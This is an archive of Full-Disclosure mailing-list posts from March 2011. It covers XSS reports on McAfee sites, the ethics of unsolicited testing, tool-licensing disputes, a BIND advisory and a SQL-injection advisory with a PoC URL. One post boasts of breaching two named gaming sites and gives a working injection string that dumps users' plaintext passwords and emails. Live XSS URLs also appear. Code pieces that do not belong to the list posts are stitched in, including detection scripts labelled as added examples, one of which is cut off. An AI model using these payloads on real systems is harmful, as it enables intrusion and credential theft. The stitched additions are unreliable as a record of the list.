Too funny. I wonder if Aaron Barr is consulting for Cenzic.

Jeff

 [SNIP]



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Thor (Hammer of God)
Well, I think there is a flip side to this, and that is the fact that no one is 
asking these people to inspect their sites for vulnerabilities.   They are 
taking it upon themselves to scan the sites actively looking for 
vulnerabilities for the sole purpose of exposing them.  They may say that they 
are doing it to ensure that the vendors fix their problems but it's not 
really any of their business to do so.

I think someone would be hard pressed to justify (defend) their actions when 
they basically attack a site that they don't own, without permission, with 
the express intent of finding a vulnerability.  That's the difference between a 
test and an attack.   It doesn't matter how trivial their finds are, or 
what the outcome of the scan is, it is the fact that no one asked, nor wants 
them to do this.  

Technically, what they are doing is in fact illegal - in the US anyway.   So 
there is another aspect of this that deserves some discussion, I think.

t


-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-
boun...@lists.grok.org.uk] On Behalf Of Ryan Sears
Sent: Wednesday, March 30, 2011 10:45 AM
To: noloa...@gmail.com
Cc: full-disclosure
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

Seriously. I gotta say I feel like people at Cenzic (and Mcafee for that
matter), if anyone should understand that a XSS should really only be
construed a 'criminal act' if it's indeed used to attack someone. If a group
is taking the time out of their day to find and disclose issues to Mcafee,
they should probably be thankful. What about finding a vulnerability in
Mcafee's virus scanner? Could that be construed as a 'criminal act' if they
disclose it? Where do you draw the line?

Basically this sort of thing pushes the community into silence until something
truly criminal happens. I'm not saying give anyone massive amounts of credit
for publishing a few XSS bugs (because there's millions of them out there),
but don't label them as a criminal for trying to help. That's just idiotic IMO.

If you run an enterprise level solution for antivirus AND web vulnerability
testing, the community understands that it's a process not unlike any other.
There will be bugs, but it only demolishes the image of Mcafee to see them
handle it like this in particular. If they would have been appreciative about
it, and promptly fixed their website (or at the very least maintained friendly
contact) this incident would have pretty much gone un-noticed.

Look at LastPass as an example.

http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html

They had someone poking at their site, who managed to find a XSS bug using
CRLF injections. They were appreciative of the find, 2.5 hrs later the issue
was fixed, and there was that blog post about exactly what they were going to
do about it. They took full responsibility for the fact that THEIR coding was
to blame, and basically said 'This is what happened, and this is why it will
probably never happen again'. This spoke hugely to me (as I'm sure it did the
rest of the community) because it shows a company that's willing to admit it
made a mistake, as opposed to sitting on their haunches and blaming people
for looking for these sorts of bugs. Oh and not every customer of their
service has to pay massive licensing fees, as there's a free version as well.
In my mind at least this equates to a company that cares more about their
customers that don't pay a single dime, than a company who forces people to
pay massive amounts of coin for shaky automated scanning and services. That's
just the way I see it though.


Someone's gotta tell the emperor he has no clothes on.

Ryan

- Original Message -
From: Jeffrey Walton noloa...@gmail.com
To: YGN Ethical Hacker Group li...@yehg.net
Cc: full-disclosure full-disclosure@lists.grok.org.uk
Sent: Wednesday, March 30, 2011 1:05:42 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group li...@yehg.net
wrote:
 According to xssed.com,  there are two remaining XSS issues:

 https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
 https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


 You guys know our disclosed issues are very simple and can easily be
 found through viewing HTML/JS source codes and simple Google Hacking
 (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

 However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
 http://www.cenzic.com/company/management/khera/,  according to Network
 World News editor - Ellen Messmer.  Thus, the next target is Cenzic
 web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
 is.
Too funny. I wonder if Aaron Barr is consulting for Cenzic.

Jeff

 [SNIP]


Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread runlvl
Steve, thanks to the community support we are able to afford hosting
for insect pro with unlimited bandwidth. Now located in USA which
allows higher transfer rates.

We apologize if you got the wrong picture, but right now we don't need
unofficial hosting... I don't care if you want to share it with
whoever you want. I do appreciate your offer but we are going to pass
this time. We have official releases almost every week.

The latest version is on our own site and we started to share every
new version with all our supporters, thus there is no need to include
mirrors so far. If something comes up I'll let you know.

I'm sending you the latest version of Insect Pro 2.5 to your personal
email in a couple of minutes.

If you have any questions, comments, or concerns, feel free to email
me at jsa...@insecurityresearch.com

Juan Sacco

2011/3/30 Steven Pinkham steve.pink...@gmail.com:
 runlvl wrote:
 The INSECT Pro version hosted on that site is really old, from what I
 see is the version 1.1 and is not an official version, on the other
 side.

 The version made available is older (2.0 version, not 1.1 as you claim), but
 it is an official version, or at least what you gave me as an official
 download.  There is also a recompressed version with the same content for a
 smaller download size for people that want that.
 As I said before, I'll happily update the version hosted there to the newest
 version if you allow it.  My download password stopped working at the time
 of the next release, and emails about it have been ignored.

 INSECT Pro 2.5 is free and we only ask for a donation to show
 interest. The amount of the donation is not fixed.

 Please, let's not start this up again.  Your page clearly says you are
 buying a license, and has removed all comments about it being free.  The
 licenses of the software you include (Metasploit and Skipfish) allow this,
 and there's no benefit to you making the claim of the software being free.
  You may or may not offer some licenses gratis, but that's different from
 the software being free in the sense that most people understand.  If it's
 free, I'll happily host newer versions for free download for everyone.
  Otherwise, stick with the license language you have on your website.

 To be clear, I have no problem with you offering licenses for sale, offering
 licenses for donations, or making software freely available. Just do the one
 you are claiming to do please.
 --
  | Steven Pinkham, Security Consultant    |
  | http://www.mavensecurity.com           |
  | GPG public key ID CD31CAFB             |





Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread jabea
Quoting runlvl run...@gmail.com:

 Steve, thanks to the community support we are able to afford a hosting
 for insect pro with unlimited bandwith. Now located in USA which
 allows higher transfer rates.

 We apologize if you got the wrong picture, but right now we don't need
 unofficial hosting... I don't care if you want to share it with
 whoever you want. I do appreciate your offer but we are going to pass
 this time. We have official releases almost every weeks.


That's funny, you seemed to be happy when he offered the mirror when he
did in the past.


Quoting Benji m...@b3nji.com
 The amount of the donation is not fixed.
 Can I make a 0 euro donation?


I love that quote, as the tool is supposed to be free but with a
forced donation! Honestly, using FD to advertise a tool that is not
free should not be authorized.





Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

2011-03-30 Thread Nagareshwar Talekar
Hey Guys,

That's interesting reversing work and we appreciate your comments on the same.

This tool is from one of our contributing authors, Neeraj
(appnimi.com). He is new to this tool development and to the protocols
by which we acknowledge others' contributions in our work.

I have now talked to the author and he will be introducing an ACK section for
the same. Soon we will update our pages too.

Generally we give complete credit to others' work, however small it may be!

Thank you !

With Regards
Nagareshwar Talekar

http://SecurityXploded.com
http://PasswordForensics.com/
http://NetCertScanner.com
http://twitter.com/securityxploded



On Wed, Mar 30, 2011 at 8:29 PM, Tim tim-secur...@sentinelchicken.org wrote:
  why do we need an installer then? Distribute that tool as a single
  executable.

 Because without the installer, it can't try to monetize the install by 
 installing search toolbars! (It's nice enough to continue the install if you 
 reject their terms, though.)


 On 2011-03-29, at 13:13, Jo Galara wrote:
  How does it work? Bruteforce?

 Yes, but... well, JAD does a better job of explaining than I possibly could:

       Runtime rt = Runtime.getRuntime();
 
       String str = "7z.exe x ";
       str = str + "\"" + _filepath + "\" ";
       str = str + "-p\"" + pwd + "\" ";
       str = str + "-o\"" + _destpath + "\"";
       str = str + " -y";
 
       System.out.println(str);
 
       // Runtime.exec(String) tokenizes on whitespace only, so the embedded
       // \" characters reach 7z.exe literally instead of grouping a path or
       // password that contains spaces.
       Process p = rt.exec(str);
       p.waitFor();
 
       if (p.exitValue() == 0)
       {
         ret = true;
       }


 That's funny (i.e. pathetic).

 A quick search of the tool's website doesn't reveal any links to the
 7-zip website.  I'm not going to bother to download this tool, since a
 1-line shell script would accomplish the same thing, but if 7-zip
 isn't linked to in the accompanying documentation, then that would be
 a violation of the LGPL.  From 7-zip's FAQ:

  Can I use the EXE or DLL files from 7-Zip in a Commercial Application?

  Yes, but you are required to specify in your documentation (1) that
  you used parts of the 7-Zip program, (2) that 7-Zip is licensed under
  the GNU LGPL license and (3) you must give a link to www.7-zip.org,
  where the source code can be found.


 tim





--


[Full-disclosure] [SECURITY] [DSA 2208-1] bind9 security update

2011-03-30 Thread Florian Weimer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2208-1   secur...@debian.org
http://www.debian.org/security/Florian Weimer
March 30, 2011 http://www.debian.org/security/faq
- -

Package: bind9
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-0414

It was discovered that BIND, a DNS server, contains a race condition
when processing zones updates in an authoritative server, either
through dynamic DNS updates or incremental zone transfer (IXFR).  Such
an update while processing a query could result in deadlock and denial
of service.  (CVE-2011-0414)

In addition, this security update addresses a defect related to the
processing of new DNSSEC DS records by the caching resolver, which may
lead to name resolution failures in the delegated zone.  If DNSSEC
validation is enabled, this issue can make domains ending in .COM
unavailable when the DS record for .COM is added to the DNS root zone
on March 31st, 2011.  An unpatched server which is affected by this
issue can be restarted, thus re-enabling resolution of .COM domains.
This workaround applies to the version in oldstable, too.

Configurations not using DNSSEC validations are not affected by this
second issue.

For the oldstable distribution (lenny), the DS record issue will be
fixed soon.  (CVE-2011-0414 does not affect the lenny version.)

For the stable distribution (squeeze), this problem has been fixed in
version 1:9.7.3.dfsg-1~squeeze1.

For the testing distribution (wheezy) and the unstable distribution
(sid), this problem has been fixed in version 1:9.7.3.dfsg-1.

We recommend that you upgrade your bind9 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJNk4LQAAoJEL97/wQC1SS+wH8IAJk6iM470E3CdS+R1lmEPL13
y1+wsx8O2kf9UreLOfSnGnP0TZTHaq5AIPU+To2ct5y9CP6QEamtsVv3zMGZhPER
nUzfTYY/uf8/zCnlm8yFb8e1xozwwtqOJ9ybqnD8AD8FHQHW7HckPPzBwnCQWk3p
R42MwM8n7iMJHZfgNI902/yE6GLRe12BZFAF91DXw6WBFZbh7AAwCAxNz2ZAbvmV
IgICrlAoVpnh1FJJN4HyAAzoTUi4AV3fHuirK356jbuSGxmdYQPCsMusUifNStf/
M2NGeDaaWMzk9Uc/+2RjviEjimeLP+UwWVaIHtMVCuCS3lXELm/fG+7rJcvQJXk=
=vq+V
-END PGP SIGNATURE-



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Ryan Sears

How about the scenario in which one statically audits some javascript sitting 
on a site, to notice it does something in an unsafe manner, and can be used in 
an XSS attack without actually making it happen? There was no actual 
'attacking' done, but there was still a vulnerability discovered. Is THAT 
considered an illegal act? Is putting a '3' into a web form/comment section 
considered attacking it if you look at the source to see how the character 
translated? What if you just wanted to make an ascii heart? My point is it's a 
very blurry line, and there are a lot of scenarios where one may discover a 
vulnerability without even having to do anything.

As for the source code disclosures, there was absolutely no 'attacking' done. 
This was a huge oversight in the site devs, and they were giving that 
information to anyone who requested it, plain and simple. What about the Tumblr 
incident that happened a while ago? Just because they screwed up a production 
script, they ended up leaking massive amounts of internal infrastructure 
details, as well as private API keys, and other stuff that could be used for 
nefarious means. Is it illegal to visit that page? I think not, as THEY were 
putting the information out there (albeit by accident), but I as a user have no 
way to know that. 

I understand what you're saying about them not asking people to look for bugs, 
but it IS the internet. Companies don't typically ask external people to audit 
their executables either, but people do it for a number of reasons (mainly 
education). 

If they leave their site up, people will potentially poke at it. That's just 
the way it is. If I have a vested interest in a company (be it monetary or 
simply supporting its cause), I personally want to see the site flourish, 
because I am then a part of that site. I want to make sure that my personal 
information is protected, and if I do find a bug somewhere, I report it. I 
recently found an XSS in OpenDNS's landing page, and they were very 
appreciative, very professional, and prompt to respond. This made me WANT to 
work with them further to ensure that their infrastructure was hardened to 
other forms of attack as well. I don't disclose these sorts of issues publicly, 
because I give the developers a chance to fix it, and in my past experience 
most companies are happy that I reported an issue, because I could have just as 
easily not said anything. If it does come down to it though, I follow my own 
public disclosure policy (http://talesofacoldadmin.com/disclosure.html) based 
off Rain Forest Puppy's. It basically just asks for somewhat consistent lines 
of communication after I disclose something. If the communication drops (or is 
non-existent), then it's at my own discretion to disclose it in a public forum. 

I don't HAVE to disclose anything to anyone, I CHOOSE to disclose it, but if 
choosing to disclose something (even in private) means potential legal 
troubles, then that takes away the motivation for me to disclose it in any 
form. I'm still going to be finding bugs for my own educational purposes, but 
I'll just stop disclosing them. That in itself starts to undermine the internet 
as a whole, leading to the restriction of information exchange, which is 
appalling. 

It IS technically illegal to do these sorts of tests without consent, but at 
what point DOES it become a 'test'? There's some cases, granted, in which the 
intention is clear (testing for blind SQL injections, etc) as they leave a huge 
footprint, but there's no explicitly clear line in which it becomes illegal. Is 
adding a ' to my name illegal? What if my 70+ year old grandmother did it by 
accident? Could she be persecuted as well? You can't apply the law to only some 
situations and not others. 

I also point you to one of my favorite XKCD's = http://xkcd.com/327/

Is naming your kid something like that technically illegal? Then that starts 
getting into free-speech issues, which are most certainly protected by the 
constitution. If I want my name to be Ann !@#$%^*() Hero, and the site 
doesn't explicitly tell me I can't do so, then how can I be expected to 
reasonably know where their boundaries are? I don't see any terms of use for 
using their website anywhere. 

This is all just my opinion though, and sorry for the long message!

Ryan

- Original Message -
From: Thor (Hammer of God) t...@hammerofgod.com
To: Ryan Sears rdse...@mtu.edu, noloa...@gmail.com
Cc: full-disclosure full-disclosure@lists.grok.org.uk
Sent: Wednesday, March 30, 2011 2:12:37 PM GMT -05:00 US/Canada Eastern
Subject: RE: [Full-disclosure] Vulnerabilities in *McAfee.com

Well, I think there is a flip side to this, and that is the fact that no one is 
asking these people to inspect their sites for vulnerabilities.   They are 
taking it upon themselves to scan the sites actively looking for 
vulnerabilities for the sole purpose of exposing them.  They may say that they 
are doing it to ensure that the vendors fix 

[Full-disclosure] 'Andy's PHP Knowledgebase' SQL Injection Vulnerability (CVE-2011-1546)

2011-03-30 Thread Mark Stanislav
'Andy's PHP Knowledgebase' SQL Injection Vulnerability (CVE-2011-1546)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in a_viewusers.php allowing for SQL injection via the 's' 
query parameter.

II. TESTED VERSION
---
0.95.2


III. PoC EXPLOIT
---
http://www.example.com/aphpkb/a_viewusers.php?s=1%20UNION%20SELECT%20load_file(0x2f6574632f706173737764),null,null,null,null,null,null%20limit%200


IV. SOLUTION
---
Upgrade to 0.95.3 or above.


V. REFERENCES
---
http://www.aphpkb.org/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1546
http://www.uncompiled.com/2011/03/cve-2011-1546/


VI. TIMELINE
---
03/13/2011 - Initial vendor disclosure
03/16/2011 - Vendor patched and released an updated version
03/16/2011 - Confirmed fix & disclosure date
03/30/2011 - Public disclosure
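Defensive detection logic for the class of request shown in the PoC above, as an added example that is not part of the advisory: it parses combined-format access log lines, URL-decodes each query parameter, unpacks MySQL hex string literals so the analyst sees the real file name, and flags UNION/SELECT and load_file() in any parameter. The log lines are constructed; the regexes and field names are my own.

```python
"""Detect SQL-injection attempts of the CVE-2011-1546 kind in web access logs."""
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
# Indicators of the injection class used in the advisory's PoC.
UNION_SELECT_RE = re.compile(r'\bunion\b[\s/*]+(?:all\s+)?select\b', re.I)
LOAD_FILE_RE = re.compile(r'\bload_file\s*\(', re.I)
HEX_LITERAL_RE = re.compile(r'\b0x([0-9a-f]+)\b', re.I)


def decode_hex_literals(text: str) -> str:
    """Replace MySQL hex string literals (0x2f6574632f...) with their ASCII value,
    so the analyst sees '/etc/passwd' instead of a hex blob."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:           # odd length: not a byte string, leave as-is
            return m.group(0)
        return bytes.fromhex(digits).decode('ascii', 'backslashreplace')
    return HEX_LITERAL_RE.sub(repl, text)


def analyze_request(target: str) -> dict:
    """Inspect every query parameter of one request target (path?query)."""
    parts = urlsplit(target)
    findings = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            decoded = decode_hex_literals(value)   # parse_qs already URL-decoded it
            reasons = []
            if UNION_SELECT_RE.search(decoded):
                reasons.append('union-select')
            if LOAD_FILE_RE.search(decoded):
                reasons.append('load_file')
            if reasons:
                findings.append({'param': name, 'decoded': decoded, 'reasons': reasons})
    return {'path': parts.path, 'findings': findings}


def scan_log(lines) -> list:
    """Return one alert per request whose parameters carry injection indicators."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                    # not combined format: skip rather than crash
        result = analyze_request(m.group('target'))
        if result['findings']:
            alerts.append({'ip': m.group('ip'), 'ts': m.group('ts'), **result})
    return alerts


# Constructed sample log lines: a normal request, the advisory's PoC, and a
# benign search that happens to contain the word "union" (must not alert).
LOG_LINES = [
    '203.0.113.5 - - [30/Mar/2011:10:15:01 +0000] "GET /aphpkb/a_viewusers.php?s=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/Mar/2011:10:15:09 +0000] "GET /aphpkb/a_viewusers.php?s=1%20UNION%20SELECT'
    '%20load_file(0x2f6574632f706173737764),null,null,null,null,null,null%20limit%200 HTTP/1.1" 200 6230',
    '203.0.113.9 - - [30/Mar/2011:10:16:44 +0000] "GET /aphpkb/index.php?q=union+station HTTP/1.1" 200 3100',
]

if __name__ == '__main__':
    for alert in scan_log(LOG_LINES):
        for f in alert['findings']:
            print(f"{alert['ts']} {alert['ip']} {alert['path']} param={f['param']} "
                  f"{','.join(f['reasons'])}: {f['decoded']}")
```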


Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread jabea
Quoting Cal Leeming c...@foxwhisper.co.uk:

 What this really comes down to... Is the product *worth* donating to? If it
 is, then donate. If it isn't, then don't. I can't personally comment either
 way as I haven't tried it.


I agree with you, but in order to test it you *must* donate. First  
time I see that.

Unless you email the authors, or are an FD subscriber and have used  
Steven's mirror. (pre 2.5 was tagged free, now it's tagged There is  
no fixed price to get a copy).

I just mean, make real licensing behind the tool if you want to sell  
it, or use an open licence, but don't play with words in between.

Playing the donation way can be complex: if a user wants a receipt for  
their donation, can they produce it? (I don't know USA law, but where  
I live only an official non-profit organisation can receive a  
'donation'. Else it's simply considered a money gift). Their site  
advertises donations as 10, 50 and 100$; again, where I live you have  
the obligation to produce a receipt for donations over 10$.

But my point is simply that they just don't look professional, and I judge  
them that way because they try to sell the product, not like GPL  
source code or freeware.




-phil



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Thor (Hammer of God)
Nah, not from my POV anyway…   I'm not concerned with who is attacking whom 
from where – I just tend to say something when people claim to be "ethical 
hackers" but then say they are going to target a security company because they 
are criticizing the group for targeting people.   It seems redundantly ironic.  Or 
would that be ironically redundant?
t

From: andrew.wallace [mailto:andrew.wall...@rocketmail.com]
Sent: Wednesday, March 30, 2011 1:10 PM
To: noloa...@gmail.com; n...@myproxylists.com; c...@foxwhisper.co.uk; 
pa...@ximen.es; m...@b3nji.com; Thor (Hammer of God); uuf6...@gmail.com; 
rdse...@mtu.edu
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

Guys,

Is it because these are Burmese hackers as to why everyone is getting in a 
pickle, e.g. eastern hackers attacking western companies? I feel an Obama moment 
coming on, where he condemns the group known as YGN.

Andrew

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Thor (Hammer of God)
I have that very strip printed and on the wall in my office :)  You make 
several points, but the response that immediately comes to mind is that I 
actually see a difference between actively scanning content for 
structural/coding vulnerabilities, and entering data in a search box.  I don't 
know if there is any basis for this legally, but I feel that if you put a box 
up and I can search for something, then I can put whatever I want in that box.  
You (the royal you) are basically soliciting people to put data in the box.   
However, you are not asking anyone to spider your site or run scans against it. 
 

That said, my guess is that it would all come down to intent.  If I put ' or 
1=1-- (like the site I had that some camper sniped) in, it's a pretty sure bet 
that I'm looking for SQL injection.  But I don't know if the search box 
entitles me to do that.  It certainly is interesting list fodder though...  

-Original Message-
From: Ryan Sears [mailto:rdse...@mtu.edu]
Sent: Wednesday, March 30, 2011 12:30 PM
To: Thor (Hammer of God)
Cc: full-disclosure; noloa...@gmail.com
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com


How about the scenario in which one statically audits some javascript sitting
on a site, to notice it does something in an unsafe manner, and can be used in
an XSS attack without actually making it happen? There was no actual
'attacking' done, but there was still a vulnerability discovered. Is THAT
considered an illegal act? Is putting a '3' into a web form/comment section
considered attacking it if you look at the source to see how the character
translated? What if you just wanted to make an ascii heart? My point is it's a
very blurry line, and there are a lot of scenarios where one may discover a
vulnerability without even having to do anything.

As for the source code disclosures, there was absolutely no 'attacking' done.
This was a huge oversight in the site devs, and they were giving that
information to anyone who requested it, plain and simple. What about the
Tumblr incident that happened a while ago? Just because they screwed up a
production script, they ended up leaking massive amounts of internal
infrastructure details, as well as private API keys, and other stuff that
could be used for nefarious means. Is it illegal to visit that page? I think
not, as THEY were putting the information out there (albeit by accident), but
I as a user have no way to know that.

I understand what you're saying about them not asking people to look for
bugs, but it IS the internet. Companies don't typically ask external people to
audit their executables either, but people do it for a number of reasons
(mainly education).

If they leave their site up, people will potentially poke at it. That's just
the way it is. If I have a vested interest in a company (be it monetary or
simply supporting its cause), I personally want to see the site flourish,
because I am then a part of that site. I want to make sure that my personal
information is protected, and if I do find a bug somewhere, I report it. I
recently found an XSS in OpenDNS's landing page, and they were very
appreciative, very professional, and prompt to respond. This made me WANT to
work with them further to ensure that their infrastructure was hardened to
other forms of attack as well. I don't disclose these sorts of issues publicly,
because I give the developers a chance to fix it, and in my past experience
most companies are happy that I reported an issue, because I could have just
as easily not said anything. If it does come down to it though, I follow my
own public disclosure policy (http://talesofacoldadmin.com/disclosure.html)
based off Rain Forest Puppy's. It basically just asks for somewhat consistent
lines of communication after I disclose something. If the communication drops
(or is non-existent), then it's at my own discretion to disclose it in a
public forum.

I don't HAVE to disclose anything to anyone, I CHOOSE to disclose it, but if
choosing to disclose something (even in private) means potential legal
troubles, then that takes away the motivation for me to disclose it in any
form. I'm still going to be finding bugs for my own educational purposes, but
I'll just stop disclosing them. That in itself starts to undermine the
internet as a whole, leading to the restriction of information exchange, which
is appalling.

It IS technically illegal to do these sorts of tests without consent, but at
what point DOES it become a 'test'? There's some cases, granted, in which the
intention is clear (testing for blind SQL injections, etc) as they leave a huge
footprint, but there's no explicitly clear line in which it becomes illegal. Is
adding a ' to my name illegal? What if my 70+ year old grandmother did it by
accident? Could she be persecuted as well? You can't apply the law to only
some situations and not others.

I also point you to one of my favorite XKCD's = http://xkcd.com/327/

Is naming your kid 

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Jeffrey Walton
On Wed, Mar 30, 2011 at 4:36 PM, Thor (Hammer of God)
t...@hammerofgod.com wrote:
 I have that very strip printed and on the wall in my office :)    You make 
 several points, but the response that immediately comes to mind is that I 
 actually see a difference between actively scanning content for 
 structural/coding vulnerabilities, and entering data in a search box.  I 
 don't know if there is any basis for this legally, but I feel that if you put 
 a box up and I can search for something, then I can put whatever I want in 
 that box.  You (the royal you) are basically soliciting people to put data in 
 the box.   However, you are not asking anyone to spider your site or run 
 scans against it.

If a person or company places a host on the public internet and offers
a service, I don't think it's reasonable to claim some input is fair
and other input is unfair. Perhaps the person or company should not
offer public services in the first place.

It seems reasonable (to me) that users of the site expect that the
site is relatively defect free and secure. A tech-savvy user who tests
the site through its public interface is simply exercising due
diligence before using the services of the site. I personally feel
that individuals and companies which want to criminalize 'due
diligence' are cowardly at best. I don't want to use the services of
such a site; nor do I want to have an account on such a system.

Jeff



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Ryan Sears
Agreed, If you put your site on the open internet, you have to take into 
account the inherent hostilities that go along with that action. 

A security firm like Mcafee /knows/ about these vulnerabilities. Guaranteed. If 
they offer services to make others' sites 'hacker proof', their first order of 
business should be to make sure that their infrastructure doesn't have blatantly 
obvious security holes. I'm not saying that they should catch EVERYTHING, but 
these are bugs that an automated scanner could easily pick up. I do understand 
that  a large infrastructure like theirs has pages that have been created by 
people with varying degrees of competence, but that's why they need to do 
inclusive penetration tests of their own network. At the very least they need 
to have some mechanism in place to detect (and possibly defer) these sorts of 
attacks. 

The way I see it, when a company hides behind legal threats to deter people 
from finding and reporting bugs, all they're doing is hurting themselves. Look 
at how Microsoft has turned around. 10 years ago they weren't dealing with 
people reporting issues in the right way, but they soon came to realize that by 
listening to the hackers that ARE coming forward with issues, they not only 
help themselves, but help the community as well. It's a win/win scenario for 
EVERYONE. 

You can tell a vast amount about how an infrastructure is run from just a bit 
of poking. If there are blatant security holes everywhere, then they clearly 
don't take security seriously. If they filter for SQL injections in javascript, 
then the devs have no clue what they're actually trying to do. If you see SQL 
errors, chances are there are more serious issues to boot. I usually limit my 
poking to the very basic of basics when I do use a new service, and the more 
transparent they are (think reddit) the more I trust them. They even have a 
full subreddit devoted to finding and learning about XSS attacks. One word, 
awesome. 

Simply put, in my opinion you can't blame a pen-tester for looking for bugs in 
a site. The only time it should be considered malicious is when it's used in a 
malicious way. If I find an XSS in a webform, and I report it along with 
remediation suggestions, I feel as though I'm doing the site a favor. It's 
unfortunate to think that some see this as a criminal activity. 

Ryan

- Original Message -
From: Jeffrey Walton noloa...@gmail.com
To: Thor (Hammer of God) t...@hammerofgod.com
Cc: Ryan Sears rdse...@mtu.edu, full-disclosure 
full-disclosure@lists.grok.org.uk
Sent: Wednesday, March 30, 2011 5:28:59 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

On Wed, Mar 30, 2011 at 4:36 PM, Thor (Hammer of God)
t...@hammerofgod.com wrote:
 I have that very strip printed and on the wall in my office :)    You make 
 several points, but the response that immediately comes to mind is that I 
 actually see a difference between actively scanning content for 
 structural/coding vulnerabilities, and entering data in a search box.  I 
 don't know if there is any basis for this legally, but I feel that if you put 
 a box up and I can search for something, then I can put whatever I want in 
 that box.  You (the royal you) are basically soliciting people to put data in 
 the box.   However, you are not asking anyone to spider your site or run 
 scans against it.

If a person or company places a host on the public internet and offers
a service, I don't think it's reasonable to claim some input is fair
and other input is unfair. Perhaps the person or company should not
offer public services in the first place.

It seems reasonable (to me) that users of the site expect that the
site is relatively defect free and secure. A tech-savvy user who tests
the site through its public interface is simply exercising due
diligence before using the services of the site. I personally feel
that individuals and companies which want to criminalize 'due
diligence' are cowardly at best. I don't want to use the services of
such a site; nor do I want to have an account on such a system.

Jeff


[Full-disclosure] bcwars.com pokerrpg.com hacked 200k Email and Plain text passwords

2011-03-30 Thread Bob Smith
Nother game, nother haxed db

2 games
pokerrpg.com
and
bcwars.com

over 100k users each

admin used plaintext passwords

how dumb

got in thru sql injection in the forum

tried helping the admin fix but dumbass Dadfish kept being a dick so
this disclosure is because of him


injection was
http://bcwars.com/forum/category/-3' union select
concat(id,'',username,':::',password,':::',email) from
tblUsers-- -



Re: [Full-disclosure] nuclear plants reach software quality levels

2011-03-30 Thread Graham Gower
On 30 March 2011 21:53, Peter Osterberg j...@vel.nu wrote:
 Risk would be a lot higher than 10 percent if it was, say, 300 years since 
 the last tsunami

Time to go back to school. Or, perhaps you'd like to come play at my casino...



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread YGN Ethical Hacker Group
Thanks for all your inputs and discussions.

We believe keeping this information secret is unethical and irresponsible.



For those who think/criticize that we're unethical/illegal,

there is a so-called Passive Scanning technique in security testing.

Passive scanning (a.k.a. Passive Reconnaissance) is basically examining
web site work flows and the source code involved to identify
vulnerabilities without ever attacking the target itself.

Contrary to what most people think, passive scanning allows
everyone to audit any web site without breaking the law and without
alarming the firewalls in front.

Basically it starts as:

1. Do Google Hacking and look for potential information leakage. (Most
of the tools allow you to add your own GH Dorks).

2. Browse the target web site with a scanner that has passive
vulnerability scanning capability - ratproxy, zaproxy, webscarab,
fiddler+watcher, burp-pro or you name it.
Also use meta data extraction tools. And look for potential
information leakage & others.

3. Examine all contents of JavaScript & decompiled Flash/Silverlight/Java Applets

4. Look for common vulnerable points and misuses,
e.g., for JS files, examine calls like document.URLUnencoded,
document.referer, document.location, window.location,
location.href, document.URL ...etc


Passive scan is just a small subset of the assessment realm. Findings are
very limited.

Our recent disclosure of the Plesk open redirect flaw was the result of a
purely passive scan on a static HTML web site -
http://yehg.net/lab/pr0js/advisories/%5Bplesk_7.0-8.2%5D_open_url_redirection
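A minimal static pass over a JavaScript file for the DOM sources step 4 lists, as an added example (my code, not YGN's and not any of the tools named above): it reads source only, sends no request, follows one level of variable assignment, and rates a statement 'high' only when a source reaches a rendering or code sink in the same statement. The sink list, the extra location.* properties and the sample script are my own assumptions.

```python
"""Passive audit of JavaScript for DOM-XSS candidates: source-only, sends no requests."""
import re

# DOM sources named in the post, plus the browser spelling 'document.referrer' and
# the two location sub-properties page scripts most often read (my additions).
DOM_SOURCES = [
    'document.URLUnencoded', 'document.referer', 'document.referrer',
    'document.location', 'window.location', 'location.href',
    'location.search', 'location.hash', 'document.URL',
]
# Sinks where text becomes markup or code. This list is my assumption, not the post's.
DOM_SINKS = [
    'innerHTML', 'outerHTML', 'insertAdjacentHTML', 'document.write',
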